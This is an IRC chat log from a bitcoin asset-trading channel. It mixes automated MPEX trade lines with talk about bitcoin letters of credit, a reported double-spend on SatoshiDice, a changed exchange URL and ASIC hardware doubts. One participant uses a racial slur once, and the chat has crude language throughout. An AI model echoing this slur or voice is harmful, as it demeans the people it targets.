= 3.5193 BTC [+] Dec 16 16:15:10 [MPEX] [S.MPOE] 4017 @ 0.00062415 = 2.5072 BTC [+] Dec 16 16:15:14 line of credit right? Dec 16 16:16:03 [MPEX] [S.MPOE] 4321 @ 0.00061317 = 2.6495 BTC [-] Dec 16 16:16:03 [MPEX] [S.MPOE] 6644 @ 0.00061293 = 4.0723 BTC [-] Dec 16 16:17:16 [MPEX] [S.MPOE] 4321 @ 0.00061325 = 2.6499 BTC [+] Dec 16 16:17:17 [MPEX] [S.MPOE] 4929 @ 0.00061293 = 3.0211 BTC [-] Dec 16 16:17:57 I will be old, but not dead. Come by to see me, and bring a bottle. Dec 16 16:20:20 A lot of these predictions are sorta wrong Dec 16 16:20:27 Tesla made better predictions than deez Dec 16 16:20:28 nuts Dec 16 16:20:44 lets see wha mah niggy orson scott card has to say Dec 16 16:20:50 letters of credit Dec 16 16:21:26 [MPEX] [S.MPOE] 4321 @ 0.00062396 = 2.6961 BTC [+] Dec 16 16:21:27 [MPEX] [S.MPOE] 3833 @ 0.00062415 = 2.3924 BTC [+] Dec 16 16:21:29 [MPEX] [S.MPOE] 24000 @ 0.00062479 = 14.995 BTC [+] Dec 16 16:21:30 [MPEX] [S.MPOE] 18550 @ 0.00062564 = 11.6056 BTC [+] Dec 16 16:21:31 [MPEX] [S.MPOE] 10806 @ 0.00062635 = 6.7683 BTC [+] Dec 16 16:21:32 [MPEX] [S.MPOE] 11326 @ 0.00062952 = 7.1299 BTC [+] Dec 16 16:21:33 [MPEX] [S.MPOE] 814 @ 0.00062981 = 0.5127 BTC [+] Dec 16 16:22:35 you want to pay for civil engineering projects with BTC eh? Dec 16 16:22:47 that's what most people use letters of credit for Dec 16 16:23:39 mpex and silk road I think are the only two businesses with enough BTC volume to even consider large LoC's for projects. Dec 16 16:23:51 for large projects* Dec 16 16:25:00 [MPEX] [S.MPOE] 4321 @ 0.00061315 = 2.6494 BTC [-] Dec 16 16:25:02 [MPEX] [S.MPOE] 6750 @ 0.00061293 = 4.1373 BTC [-] Dec 16 16:25:03 [MPEX] [S.MPOE] 2533 @ 0.00060927 = 1.5433 BTC [-] Dec 16 16:25:03 [MPEX] [S.MPOE] 1096 @ 0.00060884 = 0.6673 BTC [-] Dec 16 16:25:13 great time to buy Dec 16 16:25:26 land and stuff Dec 16 16:25:27 point is more like, chinese factory gets paid in btc Dec 16 16:25:45 instead of everyone spending millions and waiting around for months for the banks to bother moving the locs around Dec 16 16:29:16 but we aren't at a point yet where BTC is liquid enough to use for end user payment Dec 16 16:29:24 as you stated before: "btc is not a consumer currency" Dec 16 16:29:27 [MPEX] [S.MPOE] 4321 @ 0.00060907 = 2.6318 BTC [+] Dec 16 16:29:29 [MPEX] [S.MPOE] 3466 @ 0.00060884 = 2.1102 BTC [-] Dec 16 16:31:37 this isn't consumer tho. suppose you want to buy 5 container's worth of cutlery. Dec 16 16:31:47 you find your chinese source. what now ? Dec 16 16:33:06 I'm speaking from the perspective of the chinese source Dec 16 16:33:26 you get an order for a bunch of knives and shit Dec 16 16:33:37 and the person who is buying is offering in btc Dec 16 16:33:44 how the heck am I supposed to pay my worker? Dec 16 16:33:48 workers* Dec 16 16:34:04 (because we all know chinese factories are just a 90 year old china man running in a hamster wheel) Dec 16 16:39:32 [MPEX] [S.MPOE] 14227 @ 0.00061414 = 8.7374 BTC [+] Dec 16 16:42:24 the old china man just died waiting for an answer Dec 16 16:43:16 4 generations have lived and died from order time to delivery Dec 16 16:43:36 looks like they just never got paid Dec 16 16:43:44 http://www.bankrate.com/financing/banking/banks-vs-cybercriminals/ Dec 16 16:43:49 In a scheme traced to a Russian computer and a hacker who calls himself "vorVzakone," Dec 16 16:43:55 heh, that just means thief in law. Dec 16 16:44:02 [MPEX] [S.DICE] 1541 @ 0.0033341 = 5.1378 BTC [-] Dec 16 16:44:04 [MPEX] [S.DICE] 1209 @ 0.0033268 = 4.0221 BTC [-] Dec 16 16:44:24 thestringpuller you just sell them Dec 16 16:46:48 then why not just buy them with fiat? Dec 16 16:47:40 legal thieve? Dec 16 16:47:56 oh look it's EskimoBob Dec 16 16:49:41 thats the most useless news report Dec 16 16:49:42 i have seen Dec 16 16:49:57 man, after all these years.I cant belive someones try to hack banks! WOW Dec 16 16:50:25 lol Dec 16 16:50:42 someones trying* Dec 16 16:50:45 so fucking tired -_- Dec 16 16:50:46 thestringpuller looky. in normal commerce you go to your bank, get a loc, forward it to your supplier, signa contract, get telivery Dec 16 16:50:52 they take the loc to their bank, and cash it Dec 16 16:50:52 i finished writing the code I wanted Dec 16 16:51:02 this takes about a month and costs about half a million dollars. Dec 16 16:51:09 with bitcoin it takes an hour and costs a cent. Dec 16 16:51:26 [MPEX] [S.MPOE] 12073 @ 0.00061414 = 7.4145 BTC [+] Dec 16 16:52:00 [MPEX] [S.MPOE] 7938 @ 0.00060884 = 4.833 BTC [-] Dec 16 16:52:02 [MPEX] [S.MPOE] 2762 @ 0.00060866 = 1.6811 BTC [-] Dec 16 16:53:39 sure but liquidity is an issue for large volumes there is no dark pool exchange that would handle large volumes of that much Dec 16 16:54:20 after the horror stories I hear about MTGox, trading back into a form of fiat seems...annoying Dec 16 16:55:15 Ukto: write me code Dec 16 16:55:21 I'll pay you 2 btc an hour Dec 16 16:56:49 double that, with a mcdonalds gift certificate a day :P Dec 16 16:57:12 Can I just pay you in mcdonalds Dec 16 16:57:21 and also put me in your will for when you have a mcstroke Dec 16 16:58:55 [MPEX] [S.DICE] 3391 @ 0.0033268 = 11.2812 BTC [-] Dec 16 16:58:57 [MPEX] [S.DICE] 759 @ 0.00332404 = 2.5229 BTC [-] Dec 16 16:59:37 I need a raytracer written in the next 3 hours Dec 16 16:59:44 if you can do it I"ll pay you 12 btc Dec 16 17:02:22 www.slimeland.com/raytrace/ :D Dec 16 17:03:00 wtf a javascript raytracer Dec 16 17:03:01 bold Dec 16 17:10:56 ;;buy 200 Dec 16 17:10:56 (buy [--long] [at|@] []) -- Logs a buy order for units of , at a price of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also (1 more message) Dec 16 17:11:12 ;;bid 200 Dec 16 17:11:13 Error: "bid" is not a valid command. Dec 16 17:11:16 wtf was it Dec 16 17:12:15 ;;bc,buy 200 Dec 16 17:12:16 Error: "bc,buy" is not a valid command. Dec 16 17:13:11 what are you trying to do mircea_popescu Dec 16 17:13:31 there's a "bid up to X would buy so much and cost so much" command Dec 16 17:13:39 [MPEX] [S.MPOE] 4321 @ 0.00061389 = 2.6526 BTC [+] Dec 16 17:13:39 [MPEX] [S.MPOE] 4077 @ 0.00061404 = 2.5034 BTC [+] Dec 16 17:14:28 ;;bids 200 Dec 16 17:14:30 There are currently 0 bitcoins demanded at or over 200.0 USD, worth 0.0 USD in total. Dec 16 17:14:35 ;;asks 200 Dec 16 17:14:37 There are currently 101863.18 bitcoins offered at or under 200.0 USD, worth 2321158.05691 USD in total. Dec 16 17:15:49 "mcdonalds gift certificate a day" lol, you must hate yourself :) Dec 16 17:15:57 lol Dec 16 17:16:10 was just trying to come up with something wtf'ish to toss in Dec 16 17:16:11 :P Dec 16 17:16:23 didn't you have some health problems few days back? Dec 16 17:16:31 I did? Dec 16 17:16:41 so you can gracefully refuse the job offered? Dec 16 17:16:42 heart burn mebbe... Dec 16 17:16:50 nice :) Dec 16 17:17:19 https://bitcointalk.org/index.php?topic=99497.msg1403354#msg1403354 Dec 16 17:17:29 lol Dec 16 17:17:38 Diablo-D3: saws it :P Dec 16 17:19:00 ;;bids 14 Dec 16 17:19:02 There are currently 0 bitcoins demanded at or over 14.0 USD, worth 0.0 USD in total. Dec 16 17:19:09 ;;bids 10 Dec 16 17:19:11 There are currently 88031.165 bitcoins demanded at or over 10.0 USD, worth 1043490.39366 USD in total. Dec 16 17:19:16 mircea_popescu whats the hidden agenda here https://bitcointalk.org/index.php?topic=130989.0 Dec 16 17:19:51 going after plato now lol? Dec 16 17:20:18 ROFLOL Dec 16 17:22:44 kakobrekla just zinging caldwell a little. Dec 16 17:23:02 "As a complete aside: putting a 5mn BTC buywall @ $200 each up in MtGox might actually be the most rational use of a billion dollars currently. You'll end up with 2-3 mn BTC and the price will be permanently in the hundreds. Profit." Dec 16 17:23:41 https://bitcointalk.org/index.php?topic=129337.msg1380831#msg1380831 Dec 16 17:24:14 ;> Dec 16 17:24:15 [MPEX] [S.MPOE] 4321 @ 0.00061866 = 2.6732 BTC [+] Dec 16 17:24:15 [MPEX] [S.MPOE] 10200 @ 0.00061869 = 6.3106 BTC [+] Dec 16 17:24:16 [MPEX] [S.MPOE] 20005 @ 0.0006228 = 12.4591 BTC [+] Dec 16 17:24:40 im curious what he says, if anything Dec 16 17:24:41 wow, you guys still have petrol in 80'is? I haven't see anything below 92 for years :) Dec 16 17:25:23 thestringpuller that'd prolly work. Dec 16 17:26:11 hey, the guy just sent the transcript! Dec 16 17:26:14 lower is better Dec 16 17:26:34 where is 96? Dec 16 17:27:04 85,87,89,91 Dec 16 17:27:08 is it any good mircea_popescu Dec 16 17:27:43 https://www.youtube.com/watch?v=H9jC0TP-Yug someone peek let me know how long this vid is please Dec 16 17:28:36 2.43 Dec 16 17:28:38 ty Dec 16 17:29:36 [MPEX] [S.MPOE] 4321 @ 0.00061714 = 2.6667 BTC [-] Dec 16 17:29:36 [MPEX] [S.MPOE] 8129 @ 0.00061713 = 5.0166 BTC [-] Dec 16 17:36:29 [MPEX] [S.MPOE] 4321 @ 0.00062249 = 2.6898 BTC [+] Dec 16 17:36:30 https://bitcointalk.org/index.php?topic=129566.msg1403069#msg1403069 lol Dec 16 17:36:30 [MPEX] [S.MPOE] 5645 @ 0.0006228 = 3.5157 BTC [+] Dec 16 17:36:31 [MPEX] [S.MPOE] 1984 @ 0.00062688 = 1.2437 BTC [+] Dec 16 17:37:03 mircea_popescu: PM real quick Dec 16 17:41:44 [MPEX] [S.MPOE] 4321 @ 0.00062673 = 2.7081 BTC [-] Dec 16 17:41:45 [MPEX] [S.MPOE] 6262 @ 0.00062688 = 3.9255 BTC [+] Dec 16 17:43:51 [MPEX] [S.MPOE] 4321 @ 0.00061714 = 2.6667 BTC [-] Dec 16 17:43:52 [MPEX] [S.MPOE] 5596 @ 0.00061713 = 3.4535 BTC [-] Dec 16 17:43:57 http://trilema.com/2012/monty-pextons-how-to-irritate-people/ Dec 16 17:44:03 kakobrekla ^ Dec 16 17:46:11 hehe Dec 16 17:46:21 doesnt jurov have somethign to do with coinbr? Dec 16 17:46:23 so 3 "uhh"s cost 0.5btc? Dec 16 17:46:27 :) Dec 16 17:46:28 or is my memory hazzy like usualy Dec 16 17:46:34 kakobrekla i paid the kid .65 Dec 16 17:46:40 Ukto he runs it Dec 16 17:46:40 rich man. Dec 16 17:46:46 then who is rini17 ? Dec 16 17:46:52 same? Dec 16 17:47:07 ya Dec 16 17:47:23 weird. he is apparently quie perturbed.. https://bitcointalk.org/index.php?topic=102181.msg1403381#msg1403381 Dec 16 17:48:21 quite* Dec 16 17:51:05 whatever happened to usagi "the great insurer" Dec 16 17:51:11 ;;seen usagi Dec 16 17:51:12 usagi was last seen in #bitcoin-assets 2 weeks, 1 day, 7 hours, 41 minutes, and 0 seconds ago: ahh well I guess I can't stick around... stuff to do ^^ good luck Dec 16 17:56:48 [MPEX] [S.MPOE] 4321 @ 0.0006267 = 2.708 BTC [+] Dec 16 17:56:49 [MPEX] [S.MPOE] 6329 @ 0.00062688 = 3.9675 BTC [+] Dec 16 17:59:28 i predict S.MPOE will hit 0.0007 by January Dec 16 18:00:44 I predict Santa will skip your house this year. :P Dec 16 18:00:54 your prediction is correct Dec 16 18:01:03 because my house will be empty this year Dec 16 18:01:08 hehe Dec 16 18:01:09 as I snowboard Dec 16 18:01:14 OR Dec 16 18:01:16 the world ends Dec 16 18:01:24 then no one gets christmas Dec 16 18:01:50 :P Dec 16 18:02:00 [MPEX] [S.MPOE] 4321 @ 0.00061723 = 2.6671 BTC [-] Dec 16 18:02:02 [MPEX] [S.MPOE] 225 @ 0.00061713 = 0.1389 BTC [-] Dec 16 18:02:03 [MPEX] [S.MPOE] 6354 @ 0.00061229 = 3.8905 BTC [-] Dec 16 18:02:19 ;;calc (1.272 - 1.248) Dec 16 18:02:19 0.024 Dec 16 18:04:08 [MPEX] [S.MPOE] 2000 @ 0.000615 = 1.23 BTC [+] Dec 16 18:04:10 [MPEX] [S.MPOE] 4321 @ 0.00061263 = 2.6472 BTC [-] Dec 16 18:04:11 [MPEX] [S.MPOE] 4321 @ 0.00061259 = 2.647 BTC [-] Dec 16 18:04:12 [MPEX] [S.MPOE] 2496 @ 0.00061229 = 1.5283 BTC [-] Dec 16 18:04:12 [MPEX] [S.MPOE] 3362 @ 0.00060866 = 2.0463 BTC [-] Dec 16 18:04:55 $ ~/code/bitcoin/namecoin/src/namecoind getinfo Dec 16 18:04:56 { Dec 16 18:05:03 "connections" : 50, Dec 16 18:05:04 } Dec 16 18:05:06 SRSLYT?!t Dec 16 18:05:08 wsegdglkaer;klajrflkzf Dec 16 18:05:10 mircea_popescu: how much are trilemma credits? Dec 16 18:27:16 thestringpuller a dollar buys like 1000 iirc Dec 16 18:31:50 [MPEX] [S.MPOE] 3200 @ 0.00061764 = 1.9764 BTC [+] Dec 16 18:32:49 Ukto, wouldn't you be perturbed if deadterra ignored you completely and instead chose some other trolls? Dec 16 18:36:37 in the end, maybe i'll have the last laugh and be glad i did not get pulled into the mess Dec 16 18:36:59 but ignoring my offer completely? a bit unnerving Dec 16 18:37:44 eh offers get ignored all teh time Dec 16 18:37:44 especially that we was like "i don't have time for this, gsdpt will be dissolved" Dec 16 18:38:30 anyone running mpex can check on this bizzare "Couldn't decode the reply from MPEx, perhaps you didn't sign the key?" error ? Dec 16 18:39:03 pympex i mean Dec 16 18:40:45 i don't get it (the error, i mean) Dec 16 18:41:58 Azelphur are you on ? Dec 16 18:42:05 yes Dec 16 18:42:15 mind editing self.mpex_url = 'http://polimedia.us/bitcoin/mpex.php' to read Dec 16 18:42:21 self.mpex_url = 'http://mpex.co/' Dec 16 18:42:21 mircea, if you did not change the addy, you'll get this error Dec 16 18:42:31 i think some clients are failing to redirect properly. Dec 16 18:43:02 hmm Dec 16 18:43:10 both of those go to your blog Dec 16 18:43:12 for me Dec 16 18:43:23 no wai ?! Dec 16 18:43:25 wtf is this! Dec 16 18:43:40 yo shit is broked Dec 16 18:43:41 :P Dec 16 18:43:42 [MPEX] [S.MPOE] 4321 @ 0.00061457 = 2.6556 BTC [-] Dec 16 18:43:44 [MPEX] [S.MPOE] 1121 @ 0.0006147 = 0.6891 BTC [+] Dec 16 18:43:45 [MPEX] [S.MPOE] 1108 @ 0.00061481 = 0.6812 BTC [+] Dec 16 18:43:49 dude it works for everyone except some select ppl. Dec 16 18:44:02 when did you change the dns Dec 16 18:44:17 Azelphur, so you put mpex.co into browser and end up on trilema? Dec 16 18:44:26 yep Dec 16 18:44:35 mpex.co redirects me to http://trilema.com/ Dec 16 18:44:42 this is insanirty Dec 16 18:45:02 but only in chromium. Dec 16 18:45:07 http://web-sniffer.net/?url=http%3A%2F%2Fmpex.co%2F&http=1.1 Dec 16 18:45:09 so I guess it's a cache Dec 16 18:45:30 dude dns servers... they're too broken. Dec 16 18:45:43 hehe Dec 16 18:46:24 so yea, it's probably just that people have DNS caches that havn't updated yet Dec 16 18:46:35 must be. Dec 16 18:47:06 if it's only chromium, i think is not dns, instead the chromium cached the permanent redirect that was there before Dec 16 18:47:16 yea Dec 16 18:47:26 drop cache, retry Dec 16 18:47:32 there was no mpex.co -> trilema permanent redirect Dec 16 18:47:38 ever. Dec 16 18:48:21 no, it went to polimedia.us/bitcoin/ or so Dec 16 18:48:25 nope. Dec 16 18:48:30 https://github.com/Azelphur/pyMPEx/commit/b3db9ed68ba05e398abb9144e4fbce26f17b683b Dec 16 18:48:34 :) Dec 16 18:48:40 i just bought it. Dec 16 18:48:58 Azelphur i think it needs the trialing slash Dec 16 18:49:33 wfm without the trailing slash, didn't have a trailing slash before Dec 16 18:49:40 ahh i confused it with mpex.us , sry Dec 16 18:49:48 [MPEX] [S.DICE] 4241 @ 0.00332404 = 14.0973 BTC [-] Dec 16 18:49:50 [MPEX] [S.DICE] 1040 @ 0.0033099 = 3.4423 BTC [-] Dec 16 18:49:51 [MPEX] [S.DICE] 5650 @ 0.0033085 = 18.693 BTC [-] Dec 16 18:49:52 [MPEX] [S.DICE] 4500 @ 0.00330569 = 14.8756 BTC [-] Dec 16 18:49:53 [MPEX] [S.DICE] 3624 @ 0.00330328 = 11.9711 BTC [-] Dec 16 18:49:55 [MPEX] [S.DICE] 4200 @ 0.00330166 = 13.867 BTC [-] Dec 16 18:49:56 [MPEX] [S.DICE] 2758 @ 0.00328363 = 9.0563 BTC [-] Dec 16 18:49:56 [MPEX] [S.DICE] 1300 @ 0.00328102 = 4.2653 BTC [-] Dec 16 18:49:57 [MPEX] [S.DICE] 4250 @ 0.00327777 = 13.9305 BTC [-] Dec 16 18:49:58 [MPEX] [S.DICE] 2269 @ 0.00326356 = 7.405 BTC [-] Dec 16 18:49:59 [MPEX] [S.DICE] 3150 @ 0.00325795 = 10.2625 BTC [-] Dec 16 18:50:00 [MPEX] [S.DICE] 1700 @ 0.00325586 = 5.535 BTC [-] Dec 16 18:50:01 mmm Dec 16 18:50:01 [MPEX] [S.DICE] 3050 @ 0.00325365 = 9.9236 BTC [-] Dec 16 18:50:02 [MPEX] [S.DICE] 3850 @ 0.0032516 = 12.5187 BTC [-] Dec 16 18:50:03 [MPEX] [S.DICE] 3215 @ 0.00324185 = 10.4225 BTC [-] Dec 16 18:50:04 [MPEX] [S.DICE] 700 @ 0.00323884 = 2.2672 BTC [-] Dec 16 18:50:05 [MPEX] [S.DICE] 503 @ 0.00323631 = 1.6279 BTC [-] Dec 16 18:50:44 Azelphur before it was a file tho Dec 16 18:51:07 [MPEX] [S.MPOE] 47242 @ 0.00061481 = 29.0449 BTC [+] Dec 16 18:51:09 [MPEX] [S.MPOE] 1558 @ 0.00061787 = 0.9626 BTC [+] Dec 16 18:51:18 [MPEX] [S.DICE] 299 @ 0.00323631 = 0.9677 BTC [-] Dec 16 18:51:19 mircea_popescu: doesn't matter :) Dec 16 18:51:20 [MPEX] [S.DICE] 3250 @ 0.0032254 = 10.4826 BTC [-] Dec 16 18:51:21 [MPEX] [S.DICE] 7300 @ 0.00318027 = 23.216 BTC [-] Dec 16 18:51:22 [MPEX] [S.DICE] 1000 @ 0.00200001 = 2 BTC [-] Dec 16 18:51:23 [MPEX] [S.DICE] 1000 @ 0.00181006 = 1.8101 BTC [-] Dec 16 18:51:24 [MPEX] [S.DICE] 1000 @ 0.00181003 = 1.81 BTC [-] Dec 16 18:51:24 aite! Dec 16 18:51:26 wtf Dec 16 18:51:26 [MPEX] [S.DICE] 500 @ 0.00181002 = 0.905 BTC [-] Dec 16 18:51:27 [MPEX] [S.DICE] 1000 @ 0.00180051 = 1.8005 BTC [-] Dec 16 18:51:27 as I say it works, don't fix what ain't broke (tm) :P Dec 16 18:51:28 [MPEX] [S.DICE] 1000 @ 0.00180027 = 1.8003 BTC [-] Dec 16 18:51:28 [MPEX] [S.DICE] 33651 @ 0.0018 = 60.5718 BTC [-] Dec 16 18:51:50 that's the buy of the century. Dec 16 18:59:08 kako y u no place no bids stupid. Dec 16 19:01:42 whoever got the 33k is making like what, 10% this month on divs Dec 16 19:05:17 "Looking at the amount of information I have to wade through, I've decided to (attempt) to appoint a liquidator." Dec 16 19:05:18 guess who ? Dec 16 19:06:21 Once again, stink bids FTW. 1) Place bid 2) Wait for panic 3) profit Dec 16 19:06:31 lol Dec 16 19:07:47 [MPEX] [S.MPOE] 4321 @ 0.00061346 = 2.6508 BTC [-] Dec 16 19:07:49 [MPEX] [S.MPOE] 16450 @ 0.00061331 = 10.0889 BTC [-] Dec 16 19:07:49 [MPEX] [S.MPOE] 1529 @ 0.00061128 = 0.9346 BTC [-] Dec 16 19:10:15 [MPEX] [S.MPOE] 4321 @ 0.00061786 = 2.6698 BTC [+] Dec 16 19:10:16 [MPEX] [S.MPOE] 5329 @ 0.00061787 = 3.2926 BTC [+] Dec 16 19:11:48 0.0018? Dec 16 19:12:22 thanks a lot Azelphur :) Dec 16 19:12:24 [MPEX] [X.MGCG] 175 @ 0.12333771 = 21.5841 BTC [-] Dec 16 19:12:31 wtf https://bitcointalk.org/index.php?topic=126560.msg1403453#msg1403453 Dec 16 19:12:33 mircea_popescu welcome :) Dec 16 19:13:02 eskimobob Panic due to the successful doublespend attack Dec 16 19:13:41 you think ? Dec 16 19:13:41 Bugpowder: I was reading it too but sounds like it got fixed. Dec 16 19:13:49 a little silly seeing how it was fixed already i thought Dec 16 19:14:53 I am not so worried about the possible double spend but how easy it is to copy that business and take away the clients by adding few cool features Dec 16 19:15:10 how did SDICE drop 300%? Dec 16 19:15:18 EskimoBob so do it. Dec 16 19:15:23 [MPEX] [S.MPOE] 3405 @ 0.00061757 = 2.1028 BTC [-] Dec 16 19:15:37 The doublespend is still an issue Dec 16 19:15:52 if you need to perm change rules to only allow confirmed bets Dec 16 19:16:03 then the volume will go down on the small bets at least Dec 16 19:16:25 mircea_popescu: gambling is really ugly on low business, I have told this before. I am not going to poke that pile of shit with any stick :) Dec 16 19:16:28 martingale betting is less fun if you need to wait for a confirm Dec 16 19:16:33 even if I use your hands Dec 16 19:16:36 on each loss Dec 16 19:16:46 double spend attack was successful? Dec 16 19:16:48 wtf is going on? Dec 16 19:16:51 what did I miss? Dec 16 19:16:52 on* is and Dec 16 19:16:54 you're not going to do anything other than just talk, basically. Dec 16 19:17:04 forum muppets just like you were all about duplicating sd back in august i think. Dec 16 19:17:06 where is it ? Dec 16 19:17:13 https://bitcointalk.org/index.php?topic=130764.0 Dec 16 19:17:35 I wish the asshole who sold would sell into my bi Dec 16 19:17:36 bid Dec 16 19:17:36 mircea_popescu: you go and poke that pile of shit if you like Dec 16 19:18:05 not me, I am not going to do shit like that. Dec 16 19:18:36 EskimoBob: S.DICE is the same thing as a casino Dec 16 19:18:38 which makes tons of money Dec 16 19:18:47 why is it a "pile of shit" Dec 16 19:18:54 casinos are shit in my book Dec 16 19:19:12 not really, they are essentially giant arcades for adults Dec 16 19:19:18 [MPEX] [X.IDIFF.JUN] 70 @ 0.03470276 = 2.4292 BTC Dec 16 19:19:29 you are welcome to think like that. I do not Dec 16 19:19:42 [MPEX] [S.MPOE] 916 @ 0.00061757 = 0.5657 BTC [-] Dec 16 19:19:44 you must be one of those people who think there is mob involvment Dec 16 19:19:44 [MPEX] [S.MPOE] 10263 @ 0.00061787 = 6.3412 BTC [+] Dec 16 19:19:45 [MPEX] [S.MPOE] 1507 @ 0.00062202 = 0.9374 BTC [+] Dec 16 19:19:46 [MPEX] [S.MPOE] 14492 @ 0.00062344 = 9.0349 BTC [+] Dec 16 19:19:50 LOL Dec 16 19:19:58 ;) Dec 16 19:20:10 you are funny Dec 16 19:20:11 X.IDFF.JUN @ .0347 Dec 16 19:20:15 so I'm told Dec 16 19:20:16 fuck an a Dec 16 19:20:53 S.DICE outperformed S.BVPS Dec 16 19:21:09 i wonder what BitVPS financials even look like Dec 16 19:22:51 mircea_popescu: see pm again, about the other idea you had Dec 16 19:23:07 i guess on the rise, under new management Dec 16 19:25:41 [MPEX] [X.IDIFF.MAR] 20 @ 0.07995 = 1.599 BTC Dec 16 19:29:53 YES Dec 16 19:30:12 FUCK YES Dec 16 19:30:16 Bugpowder: ? Dec 16 19:30:25 sold my .MARs Dec 16 19:30:46 1.6BTC more to by S.DICE Dec 16 19:31:26 lol buncha weirdness in futures atm Dec 16 19:31:41 for instance, mar diff is rated 8mn, june diff is rated 3.5mn ?! Dec 16 19:34:05 wow Dec 16 19:34:10 that's really ingenious Dec 16 19:34:29 indexing network difficulty against a futures contract Dec 16 19:34:39 :p Dec 16 19:35:01 [MPEX] [S.MPOE] 4321 @ 0.00061141 = 2.6419 BTC [-] Dec 16 19:35:02 [MPEX] [S.MPOE] 9271 @ 0.00061128 = 5.6672 BTC [-] Dec 16 19:35:04 [MPEX] [S.MPOE] 4508 @ 0.00061099 = 2.7543 BTC [-] Dec 16 19:36:49 I feel like its just one dude who is like, I wonder how this works, lets buy some! Dec 16 19:36:55 and sell some! Dec 16 19:37:23 lol Dec 16 19:37:33 [MPEX] [S.MPOE] 4321 @ 0.00062332 = 2.6934 BTC [+] Dec 16 19:37:34 [MPEX] [S.MPOE] 5058 @ 0.00062344 = 3.1534 BTC [+] Dec 16 19:37:36 [MPEX] [S.MPOE] 15552 @ 0.00062652 = 9.7436 BTC [+] Dec 16 19:37:38 ahahaha Dec 16 19:37:39 did you underwrite those contracts Bugpowder ? Dec 16 19:38:07 or did you buy from someone else and resell? Dec 16 19:38:24 jurov so what's this secret passthrough killer ? Dec 16 19:39:00 [MPEX] [S.MPOE] 4321 @ 0.00061127 = 2.6413 BTC [-] Dec 16 19:39:01 [MPEX] [S.MPOE] 3629 @ 0.00061099 = 2.2173 BTC [-] Dec 16 19:39:11 just some really free (as in, no monthly payments) coinbr account Dec 16 19:39:34 ;;ticker Dec 16 19:39:34 BTCUSD ticker | Best bid: 13.22000, Best ask: 13.29696, Bid-ask spread: 0.07696, Last trade: 13.21005, 24 hour volume: 19323.13716275, 24 hour low: 13.21002, 24 hour high: 13.66548, 24 hour vwap: 13.47200 Dec 16 19:39:39 figuring out other ways to screw the users, and whether it's worthwhile at all Dec 16 19:39:58 lol Dec 16 19:40:09 confucius sayz Dec 16 19:40:16 do not screw the user unless they're really hawt. Dec 16 19:40:23 don't screw me Dec 16 19:40:25 i'm not hot Dec 16 19:40:32 and coinbr is awesome Dec 16 19:40:35 :) Dec 16 19:40:42 no no, you have "Standard" account Dec 16 19:41:09 this plan would be for freeloaders, if they desire it so much, let em have it Dec 16 19:42:05 thestringpuller Just to MAR ones... To test the system. I usually can't figure out how the futures or options contracts work before I have some coins in them :-P Dec 16 19:42:55 " I feel like its just one dude who is like, I wonder how this works, lets buy some!" << now we know who :D Dec 16 19:43:27 jurov i did find it a little funny people were like.. PAYING assets to list. competition eh. Dec 16 19:44:29 [MPEX] [S.MPOE] 2900 @ 0.00062628 = 1.8162 BTC [+] Dec 16 19:44:33 hehe, yes. i considered dropping some vitriol like "and now deadterra ecretly hopes to pocket the 10btc" Dec 16 19:45:04 but let be that someone else who points out, not me Dec 16 19:45:58 it's really not such a big deal. Dec 16 19:47:22 no it's not. i'd went much more beyond some rant on btctalk if it was the case. Dec 16 19:54:43 ASIC circus is moving from ass kissing to ass kicking Dec 16 19:55:04 asics are vaporware Dec 16 19:55:47 really dense and hand rounded vaporware Dec 16 19:56:20 or is it glossware? They had pretty pictures :) Dec 16 19:58:02 i feel like everyone is underestimating the difficulty of mass producing an IC that's never been printed before Dec 16 19:58:09 vastly underestimating Dec 16 19:58:35 meh, SHA256 circuit certainly exists Dec 16 19:59:09 it's not like thay have to draw all the gates and program all that vhdl Dec 16 19:59:39 they probably copy-pasted VHDL and had a copy paste error :P Dec 16 19:59:44 (i kid) Dec 16 19:59:48 if those show up in March, we can say that that was fast. Dec 16 20:00:25 the micro electronics research facilities at technical universities cost hundreds of millions to build Dec 16 20:00:36 the dust filtration systems are state of the art Dec 16 20:01:02 just because someone can deploy a bitstream to an FPGA doesn't mean they can print a mask, and build an IC from it Dec 16 20:01:20 without say 1.5 million dollars Dec 16 20:01:24 or something insane like that Dec 16 20:01:42 how many coins was sent in preorder boom? Dec 16 20:02:04 how many of those coins were spent not on IC fabrication? Dec 16 20:02:12 I pulled bigger number out of my ass - 2 million Dec 16 20:04:29 "The design is complete. It’s just a matter of waiting for production and delivery. The boards, enclosures, and assembly teams are standing by, anxiously awaiting delivery of our 100% custom BFL ASIC chips so we can begin assembly and start shipping. " Dec 16 20:04:49 is this new ? Dec 16 20:05:06 BFL is a joke of a fabrication company. Dec 16 20:05:27 any competent electrical engineer would surely pass on a job offer from them Dec 16 20:05:34 oh fuck Dec 16 20:05:35 dude Dec 16 20:05:38 NEW FUCKING RULE Dec 16 20:05:46 NO BFL IN THIS CHANNEL Dec 16 20:05:53 TAKE IT TO THE OFFICIAL BFL THREAD Dec 16 20:05:59 XD Dec 16 20:06:06 LOL, sure Diablo-D3 Dec 16 20:06:25 worked on the forum Dec 16 20:06:36 what other topics have you forbidden, oo big Diablo-D3 :) Dec 16 20:06:37 mircea_popescu: not very new but a few days old Dec 16 20:09:00 "The design is complete. It’s just a matter of waiting for production and delivery. The boards, enclosures, and assembly teams are standing by, anxiously awaiting delivery of the chips so we can begin assembly and start shipping." Dec 16 20:09:26 thestringpuller: keep reading, it get funnier Dec 16 20:09:29 already seen that sentence somewhere Dec 16 20:10:08 the bfl thread is sinking in bullshit Dec 16 20:10:30 meanwhile diff is projected to drop like 7% Dec 16 20:10:51 mircea_popescu has spoken, buy futures! Dec 16 20:11:04 it;'s not me, its bitcoincharts Dec 16 20:11:18 Difficulty 3370182 Dec 16 20:11:18 Estimated 3106928 in 1270 blks Dec 16 20:11:40 [MPEX] [S.MPOE] 4120 @ 0.00061888 = 2.5498 BTC [-] Dec 16 20:13:43 [MPEX] [S.MPOE] 201 @ 0.00061888 = 0.1244 BTC [-] Dec 16 20:13:45 [MPEX] [S.MPOE] 23299 @ 0.00061864 = 14.4137 BTC [-] Dec 16 20:14:06 people who bought in at .0004 must be selling off Dec 16 20:15:34 ;;ticker Dec 16 20:15:34 BTCUSD ticker | Best bid: 13.30003, Best ask: 13.30004, Bid-ask spread: 0.00001, Last trade: 13.30003, 24 hour volume: 19902.69578499, 24 hour low: 13.20000, 24 hour high: 13.66548, 24 hour vwap: 13.46254 Dec 